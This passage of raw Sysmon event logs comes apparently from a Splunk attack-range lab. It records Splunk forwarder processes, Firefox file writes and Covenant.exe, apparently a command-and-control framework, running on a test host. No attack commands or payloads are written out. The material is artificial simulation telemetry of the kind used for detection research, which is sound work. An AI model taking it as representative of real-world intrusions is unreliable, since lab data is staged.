Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104562Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:59.364{54715871-709F-60CA-1D13-00000000CF01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000149896Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:59.986{39BD8DE3-709B-60CA-090D-00000000D101}6900WIN-HOST-14\AdministratorC:\Program Files\dotnet\dotnet.exeC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Data\appsettings.jsonMD5=71842EDD25D9EC9457929DE0EE2C3DD8,SHA256=6A96B152FCF92EB13BA2CB9F3205CBFDF81096B5D1005DFFE34876D22B07BEB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149895Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:59.284{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D0CC161DAE4B9A53D3588AC33A544E1,SHA256=4FD117CD958B8B841DFFE75C376F5BE0873592469DFD8859BC6F2E159185A68C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149894Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:59.200{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=D3153C08ACDFF31A2C023036AC404182,SHA256=6EABF2B6EED436A37DC218EB3B54973EC9EBA864F3C33C212525AD3BE46D3787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149893Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:59.200{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=9DD45664260C3193ED17BEA0EFB19293,SHA256=A72DFB9D41ABC53BE01ECA3AF9BEE5C3D319B0A95B3AD4D1D5B32395D7A327D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149892Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:59.200{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=5F042667A139B73D7DEC6B82157AE099,SHA256=9B10F154F29D1FE189EE03834B4A6D44FF1D15549C5578A82D448F8F1B4DC52D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149891Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:59.200{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=E59050344790EB7E899FD8FEA99E2E24,SHA256=78229C5B3949EB41018C026C8691D30BD235F3AD970F3BA8830B9DF07A5CF977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149890Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:59.200{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=DC842947E2C03082E7CDE39E7F0E3F5C,SHA256=13E47F7988B3446C33AA8E0D158DF34D01589ED94169389E7034C2E0B334CD39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149889Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:59.200{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=F41572FFEA266CCD26F6324777CC1F36,SHA256=9A510A7A8D848EEC0373E9E571D52E7DF834F2D72264D6C21F52DE679A8927AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000149888Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:56.875{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58343-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000104591Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.896{54715871-70A0-60CA-1F13-00000000CF01}63005804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000104590Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:58.694{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55388-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000104589Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.731{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70A0-60CA-1F13-00000000CF01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104588Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.730{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B5CBF80623896B74D847C037E5831D7,SHA256=61EE41B4C37FD125562F9EF065F5D4124BD501E8965654587F9FE0168CF570A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104587Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.727{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104586Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.727{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104585Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.727{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104584Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.727{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104583Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.724{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-70A0-60CA-1F13-00000000CF01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104582Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.724{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70A0-60CA-1F13-00000000CF01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104581Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.725{54715871-70A0-60CA-1F13-00000000CF01}6300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104580Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.254{54715871-70A0-60CA-1E13-00000000CF01}15885148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104579Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.048{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-70A0-60CA-1E13-00000000CF01}1588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104578Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.046{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104577Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.046{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104576Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.045{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104575Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.045{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-70A0-60CA-1E13-00000000CF01}1588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104574Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.045{54715871-FD18-60C9-0C00-00000000CF01}8486924C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104573Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.045{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-70A0-60CA-1E13-00000000CF01}1588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104572Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:00.044{54715871-70A0-60CA-1E13-00000000CF01}1588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 17141700x8000000000000000149910Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-CreatePipe2021-06-16 21:44:00.881{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808\dotnet-diagnostic-5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe 23542300x8000000000000000149909Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.766{39BD8DE3-709A-60CA-080D-00000000D101}4924WIN-HOST-14\AdministratorC:\Program Files\dotnet\dotnet.exeC:\Users\Administrator\.dotnet\TelemetryStorageService\20210616214358_165afd377d6c4fee9eace9b76a19f453.trnMD5=657F2CD4DA0071F96F92DC7F80F3E9E9,SHA256=57C3BCB312311449646DE85E98444BDB73D2CCCF0D0FC35391FCC5347FF9121D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149908Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.700{39BD8DE3-709A-60CA-080D-00000000D101}4924WIN-HOST-14\AdministratorC:\Program Files\dotnet\dotnet.exeC:\Users\Administrator\.dotnet\TelemetryStorageService\20210616214355_ab6d8eadfbd84c0ba02b7842d55c0ada.trnMD5=D5F9F254944B5EDB16D8EA4F068A06A3,SHA256=554F93B790EE6AF5EE5FE9A2DAFA23D23D0933A55936B61D5BE019A640796F8E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149907Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.649{39BD8DE3-7094-60CA-070D-00000000D101}53246676C:\Windows\system32\conhost.exe{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149906Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:00.581{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 